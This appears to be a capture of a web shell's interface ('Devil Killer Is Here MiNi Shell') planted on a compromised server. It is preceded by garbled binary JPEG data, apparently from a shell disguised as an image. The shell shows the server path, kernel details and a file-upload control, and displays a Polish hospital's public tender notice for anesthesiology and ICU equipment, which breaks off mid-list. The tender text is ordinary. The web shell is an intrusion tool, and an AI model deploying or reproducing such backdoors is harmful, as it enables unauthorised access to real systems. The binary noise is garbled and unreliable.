JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231013/0044386201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup sprzętu i aparatury w ramach Narodowego Programu Transplantacyjnego poprzez zakup sprzętu i aparatury dla oddziałów anestezjologii i intensywnej terapii z największą aktywnością donacyjną w 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Specjalistyczny Szpital im. dra Alfreda Sokołowskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890047446</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sokołowskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wałbrzych</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-309</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dorota.piekarz@zdrowie.walbrzych.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zdrowie.walbrzych.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup sprzętu i aparatury w ramach Narodowego Programu Transplantacyjnego poprzez zakup sprzętu i aparatury dla oddziałów anestezjologii i intensywnej terapii z największą aktywnością donacyjną w 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7b398d8b-68e6-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00443862</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdrowie_walbrzych <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Minimalne wymagania techniczne umożliwiające korzystanie ze Strony platformazakupowa.pl to przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości co najmniej 256 kbit/s. Platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli.<br/>2. W celu założenia Konta Użytkownika na platformazakupowa.pl, konieczne jest posiadanie przez Użytkownika aktywnego konta poczty elektronicznej (e-mail).<br/>3. Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów przy maksymalnej wielkości 150 MB.<br/>4. Składając ofertę zaleca się zaplanowanie złożenia jej z wyprzedzeniem minimum 24h, aby zdążyć w terminie przewidzianym na jej złożenie w przypadku siły wyższej, jak np. awaria platformazakupowa.pl, awaria Internetu, problemy techniczne związane z brakiem np. aktualnej przeglądarki, itp.<br/>Więcej informacji na temat wymagań technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej znajduje sie w Instrukcji dla wykonawców platformazakupowa.pl oraz Regulaminie platformazakupowa.pl, stanowiących Załącznik nr 9 i 9a do SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) Dz. U. UE. L. 2016.119.1 z dnia 4 maja 2016r., dalej jako „RODO” informujemy, że: Administratorem Pani/Pana danych osobowych przetwarzanych w związku z przeprowadzaniem postępowania o udzielenie zamówienia na: Zakup sprzętu i aparatury w ramach Narodowego Programu Transplantacyjnego poprzez zakup sprzętu i aparatury dla oddziałów anestezjologii i intensywnej terapii z największą aktywnością donacyjną w 2022r. - Zp/75/TP/23 jest Specjalistyczny Szpital im dra Alfreda Sokołowskiego w Wałbrzychu ul. Sokołowskiego 4, 58-309 Wałbrzych, telefon 74/6489600, e-mail: sekretariat@zdrowie.walbrzych.pl<br/>1.Informujemy, że Administrator wyznaczył Inspektora Ochrony Danych Osobowych (IODO), kontakt możliwy jest za pośrednictwem e-mail: iodo@zdrowie.walbrzych.pl, numer (74) 6489600 oraz osobę zastępującą IODO, kontakt za pośrednictwem e-mail: iod@zdrowie.walbrzych.pl, numer (74) 6489696 lub korespondencyjnie na adres Administratora. <br/>Celem przetwarzania danych osobowych jest wypełnienie obowiązków prawnych ciążących na jednostkach sektora finansów publicznych, w tym na podmiocie leczniczym, w zakresie przeprowadzania postępowania o udzielenie zamówienia publicznego na : Zakup sprzętu i aparatury w ramach Narodowego Programu Transplantacyjnego poprzez zakup sprzętu i aparatury dla oddziałów anestezjologii i intensywnej terapii z największą aktywnością donacyjną w 2022r. - Zp/75/TP/23 na podstawie art. 4 pkt. 1 ustawy z dnia 11 września 2019r. Prawo zamówień publicznych (tj. Dz. U. z 2023r. poz. 1605). Przesłanką legalizującą przetwarzanie tych danych osobowych na gruncie „RODO” jest art. 6 ust. 1 lit. c. W wyjątkowych przypadkach w tym samym celu będziemy również przetwarzać dane osobowe dotyczące wyroków skazujących lub naruszeń prawa na podstawie art. 108 ust. 1 w związku z art. 124 pkt. 1 cytowanej wyżej ustawy. Przesłanką legalizującą przetwarzanie tych danych osobowych na gruncie „RODO” jest art. 10.<br/>1.	Dane przekazane przez Panią/Pana będą podlegały udostępnieniu następującym kategoriom odbiorców: organy władzy publicznej, organy ścigania, inne uprawnione podmioty, w zakresie i celach, gdy występują z żądaniem w oparciu o stosowną podstawę prawną w tym np. Krajowa Izba Odwoławcza, inne podmioty, które świadczą usługi na rzecz administratora np. podmiotom świadczącym obsługę prawną, podmiotom, z którymi administrator zawarł umowę przetwarzania danych w imieniu administratora, serwisanci lub Poczta Polska.<br/>2.	Administrator nie ma zamiaru przekazywać danych osobowych do państwa trzeciego lub organizacji międzynarodowej.<br/>3.	Dane osobowe, wynikające ze zgromadzonej dokumentacji zamówienia wraz z załącznikami, będą przechowywane przez okres 4 lat licząc od dnia zakończenia postępowania o udzielenie zamówienia a w przypadku obowiązywania umowy w sprawie zamówienia publicznego powyżej 4 lat, przechowywana jest przez cały okres obowiązywania umowy w sprawie zamówienia publicznego. Jeżeli środki finansowe zostały pozyskane z funduszy europejskich wówczas taka dokumentacja będzie przechowywana przez okres wskazany w tych dokumentach przyznających te środki i mogą wynosić okresy dłuższe niż 4 lata. Po tym terminie dane będą protokolarnie niszczone.<br/>4.	Przysługuje Pani/Panu prawo dostępu do treści swoich danych oraz otrzymywania ich kopii, sprostowania ( poprawiania ) swoich danych osobowych, gdy są niezgodne ze stanem rzeczywistym. Prawo do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Prawo zamówień publicznych, w tym nie może naruszać integralności protokołu postępowania oraz jego .....</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zp/75/TP/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Urządzenie (monitor) do ciągłego pomiaru parametrów hemodynamicznych z modułami 1 – termodylucji zgodnego z cewnikami systemu SWAN-GANZ, 2 - oksymetrii tkankowej, 3 - pomiaru rzutu serca metodą małoinwazyjna, 4 - oksymetrii krwi żylnej mieszanej, 5 – wczesnego wykrywania hipotensji HPI, 6 - pomiaru rzutu serca metodą nieinwazyjną wraz ze stojakiem jezdnym (zamówienie obejmuje dostawę łącznie 1 urządzenia) – parametry wymagane:<br/>1)	Ocena hemodynamiczna układu krążenia wykorzystująca istniejącą krzywą ciśnienia tętniczego pacjenta do ciągłego pomiaru pojemności minutowej serca w oparciu o pomiar ciśnienia tętniczego.<br/>2)	Ciągły pomiar parametrów hemodynamicznych za pomocą mankietów na palec wykorzystujących metodę Volume Clamp (zaciśniętej objętości). Algorytm wykorzystuje zaawansowane metody przetwarzania w celu zrekonstruowania krzywej ciśnienia w tętnicy w palcu do krzywej ciśnienia tętniczego w tętnicy promieniowej. Mankiety na palec wyposażone są w czujnik pletyzmograficzny, który stanowi połączenie źródła i odbiornika światła, w celu ciągłego monitorowania zmian objętości krwi tętniczej w palcu. <br/>3)	Moduł do oceny hemodynamicznej układu krążenia metodą termodylucji: <br/>a)	za pomocą cewnika Swan-Ganza, <br/>b)	za pomocą cewnika Swan-Ganza CCO.<br/>4)	Ciągły pomiar saturacji tkankowej w celu emisji światła w zakresie bliskiej podczerwieni (metodą NIRS) przy wykorzystaniu analizy tkankowej 5 długości fal. Elektrody zapewniają głębokość penetracji światła powyżej 2 cm.<br/>5)	Wymagane parametry monitorowane lub wyliczane:<br/>a) rzut serca (CO);<br/>b) rzut serca indeksowany (CI)<br/>c)	objętość wyrzutowa (SV);<br/>d)	indeks objętości wyrzutowej (SVI)<br/>e)	systemowy (obwodowy) opór naczyniowy (SVR);<br/>f)	indeks systemowego oporu naczyniowego (SVRI)<br/>g)	zmienność objętości wyrzutowej (SVV);<br/>h)	centralne ciśnienie żylne (OCŻ)<br/>i)	ciśnienie średnie tętnicze (MAP)<br/>j)	częstość tętna (PR)<br/>k)	saturacja tkankowa (StO2)<br/>l)	zmienność ciśnienia tętna (PPV)<br/>m)	wskaźnik ryzyka wystapienia hipotensji HPI aktualizowany z częstotliwością co 20 sekund <br/>n)	dynamiczna elastancja tętnic (Eadyn) aktualizowany z częstotliwością co 20 sekund <br/>o) wskaźnik obwodowy kurczliwości lewej komory (dP/dt) aktualizowany z częstotliwością co 20 sekund <br/>p) względna zmiana stężenia hemoglobiny całkowitej — ΔctHb<br/>6)	Wyświetlanie danych w formie ekranów informacyjnych:<br/>a)	kokpit użytkownika wyświetlany jako ekran z dużymi kołami parametrów wskazującymi graniczne zakresy i wartości alarmowe,<br/>b)	ekran stanu fizjologicznego jako animacja obrazująca wzajemne interakcje między sercem, krwią a układem krwionośnym,<br/>c)	ekran zogniskowany umożliwiający obserwację wartości ciśnienia tętniczego krwi wraz z monitorowanymi danymi z maksymalnie trzema parametrami kluczowymi,<br/>d)	ekran graficzny/tabelaryczny umożliwiający równoczesne przeglądanie bieżącego statusu i historii wybranych monitorowanych parametrów w formie graficznej oraz innych wybranych monitorowanych parametrów w formie tabelarycznej,<br/>e)	dodatkowy ekran ze wskaźnikiem informującym o HPI (wskaźnik ryzyka wystąpienia hipotennsji), który wyświetla informacje na temat przyczyn wysokiego prawdopodobieństwa niedociśnienia lub przyczyn wystąpienia niedociśnienia.<br/>7)	Ekran dotykowy o przekątnej min 12 cali i rozdzielczości min 1024x768.<br/>8)	Wejścia/wyjścia transmisyjne: RS232, USB 2.0, USB3.0, RJ-45, HDMI, analogowe 2 szt., EKG z możliwością transmisji danych standardzie HL-7.<br/>9)	Dodatkowe zasilanie akumulatorowe z możliwością wymiany akumulatora bez interwencji serwisu.<br/>10)	Możliwość transferu danych przez port USB w postaci pliku Excel (do dalszej obróbki).<br/>11)	Menu i komunikaty tekstowe w języku polskim.<br/>12)	Waga aparatu nie więcej niż 5 kg.<br/>13)	Dedykowany stojak jezdny do zamontowania urządzenia.<br/>14)	Dopuszczenie urządzenia do obrotu na rynku polskim jako wyrobu medycznego.<br/>15)	Instrukcja obsługi w języku polskim.<br/>16)	Okres gwarancji urządzenia nie mniej niż 24 miesiące.<br/>17)	Zapewnienie urządzenia zastępczego na czas naprawy o specyfikacji równorzędnej lub wyższej od zamawianego.<br/>18)	Serwis i przeglądy urządzenia w miejscu użytkowania przez Zamawiającego.<br/>19)	Urządzenie fabrycznie nowe na gwarancji producenta z datą produkcji nie starszą niż rok 2022.<br/>20)	Zasilanie sieciowe zgodne z warunkami obowiązującymi w Polsce, AC 230 V 50 Hz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> System infuzyjny umożliwiający znieczulenie metodą docelowego stężenia osoczowego - TCI składający się z 3 pomp infuzyjnych strzykawkowych (w tym jednej do analgezji PCA) i pompy infuzyjnej objętościowej wraz ze stacją dokującą z możliwością wpięcia jednocześnie do 4 pomp, pokrywą i wózkiem jezdnym (zamówienie obejmuje dostawę łącznie 7 systemów) – parametry wymagane:<br/>A.	Pompa infuzyjna strzykawkowa:<br/>1)	Sterowana elektronicznie przeznaczona do stosowania u dorosłych, dzieci oraz noworodków w celu okresowego lub ciągłego podawania pozajelitowych i dojelitowych płynów drogą dożylną, dotętnicową, podskórną, zewnątrzoponową i dojelitową.<br/>2)	Napięcie 11-16 V DC, zasilanie przy użyciu zasilacza zewnętrznego lub Stacji Dokującej.<br/>3)	Dokładność mechaniczna &lt;&lt;±0,5%.<br/>4)	Mocowanie strzykawki umiejscowione od przodu.<br/>5)	Napęd strzykawki automatyczny.<br/>6)	Zabezpieczenie przed swobodnym przepływem, niezależnie od położenia głowicy napędowej.<br/>7)	Pompa skalibrowana do pracy ze strzykawkami o objętości 2/3, 5, 10, 20 i 50/60 ml różnych typów oraz różnych producentów.<br/>8)	Masa pompy do 1,7 kg.<br/>9)	Przestrzeń zajmowana przez pompę nie większa niż 3 000 cm3.<br/>10)	Klawiatura nawigacyjna do wprowadzania parametrów i obsługi pompy.<br/>11)	Możliwość podłączenia odłączalnego uchwytu do przenoszenia i mocowania pompy do rur i szyn medycznych pionowych i poziomych.<br/>12)	Możliwość łączenia 2 i 3 pomp w moduły bez użycia stacji dokującej<br/>13)	Podświetlany ekran i przyciski z możliwością regulacji na co najmniej 9 poziomach.<br/>14)	Regulacja głośności w zakresie od 59dBA do 74dBA na co najmniej 9 poziomach.<br/>15)	Regulacja jasności i kontrastu ekranu na co najmniej 9 poziomach.<br/>16)	Zasilanie z akumulatora wewnętrznego przez min 12 h. przy przepływie 5 ml/h.<br/>17)	Możliwość wymiany akumulatora przez użytkownika bez użycia narzędzi.<br/>18)	Możliwość programowania parametrów infuzji w mg, mcg, U lub mmol, z uwzględnieniem lub nie masy ciała w odniesieniu do czasu (np. mg/kg/min; mg/kg/h; mg/kg/24h),<br/>19)	Zakres prędkości infuzji podstawowej min. 0,1 do 999,9 ml/h Prędkość infuzji w zakresie od 0,1 - 99,99ml/h programowana co 0,01ml/godz.<br/>20)	Prędkości bolusa min.:<br/>a)	dla strzykawki o poj.3ml =1-150 ml/h,<br/>b)	dla strzykawki o poj.5ml =1-300 ml/h,<br/>c)	dla strzykawki o poj.10ml =1-500 ml/h,<br/>d)	dla strzykawki o poj.20ml =1-800 ml/h,<br/>e)	dla strzykawki o poj.30ml =1-1200 ml/h,<br/>f)	dla strzykawki o poj.50/60ml =1-1800 ml/h.<br/>21)	Możliwość utworzenia Bazy Leków używanych w infuzjoterapii na terenie szpitala z możliwością zastosowania oprogramowania do tworzenia Bibliotek Leków na poszczególne oddziały.<br/>22)	Możliwość skonfigurowania do min. 50 oddziałów w jednej pompie.<br/>23)	Biblioteka Leków zawierająca min.1 000 leków z możliwością podzielenia na min. 30 grup. <br/>24)	Biblioteka leków zawierająca po 10 stężeń dla każdego leku.<br/>25)	Leki zawarte w Bibliotece Leków powiązane z parametrami infuzji (limity względne min-max; limity bezwzględne min-max, parametry standardowe), możliwość wyświetlania naprzemiennego nazwy leku i/lub wybranych parametrów infuzji.<br/>26)	Automatyczne prowadzenie infuzji przy stopniowym wzroście i spadku prędkości. Infuzja składa się z trzech faz: wzrostu, utrzymania i spadku.<br/>27)	Automatyczne prowadzenie infuzji w trybie okresowym, składającym się z dwóch faz: bolusa <br/>i prędkości.<br/>28)	Automatyczne prowadzenie terapii dawką w czasie. Po wprowadzeniu parametrów dawki i czasu pompa automatycznie oblicza prędkość infuzji.<br/>29)	Możliwość uruchomienia w pompie trybu automatycznego przejmowania infuzji przez kolejną pompę natychmiast po zakończeniu infuzji w poprzedniej. Pompy w trakcie pracy muszą być czytelnie oznaczone. np. pompa 1, pompa 2.<br/>30)	Możliwość uruchomienia w pompie trybu TCI (ang. Target Controlled Infusion) z modelami farmakokinetycznymi dla Propofolu, Remifentanyli i Sufentanylu.<br/>31)	Możliwość podania dodatkowego bolusa w trakcie trwania terapii TCI.<br/>32)	Możliwość prowadzenia znieczulenia zewnątrzoponowego<br/>33)	Możliwość opcjonalnego rozszerzenia oprogramowania trybu PCA.<br/>34)	Możliwość podłączenia przycisku pacjenta PCA.<br/>35)	Możliwość przełączania pomiędzy infuzją ciągła a trybem PCA z podłączonym lub nie przyciskiem pacjenta – PCA.<br/>36)	Możliwość dostosowania treści wyświetlanych na ekranie pompy do wymagań użytkownika. <br/>37)	Parametry podaży bolusa wstępnego mogą być zdefiniowane dla każdego leku indywidualnie w bibliotece leków wprowadzonej do pompy.<br/>38)	Wyświetlanie proporcji pomiędzy bolusami pacjenta podanymi i żądanymi w jako stosunek liczb x/x.<br/>39)	Wyświetlanie proporcji pomiędzy bolusami pacjenta podanymi i żądanymi w procentach %.<br/>40)	Wyświetlanie czasu do końca blokady.<br/>41)	Zakres ciśnienia okluzji od 75 mmHg do 900mmHg, z wyborem na co najmniej 9 poziomach.<br/>42)	Możliwość rozszerzenia zakresu ciśnienia okluzji o trzy dodatkowe poziomy 10 mmHg, 30 mmHg, 50 mmHg.<br/>43)	Prezentacja ciągłego pomiaru ciśnienia w linii w formie graficznej.<br/>44)	Funkcja programowania objętości do podania (VTBD) 0,1- 9999 ml.<br/>45)	Funkcja programowania czasu infuzji przynajmniej od 1min – 99:59 godzin.<br/>46)	Funkcja stand-by programowana w zakresie 1 min - 23:59 godz.<br/>47)	Menu i komunikaty tekstowe w języku polskim.<br/>48)	Historia pracy obejmująca 3000 wpisów.<br/>49)	Możliwość współpracy z czytnikiem kodów kreskowych.<br/>50)	Możliwość współpracy z systemem do kontrolowanej 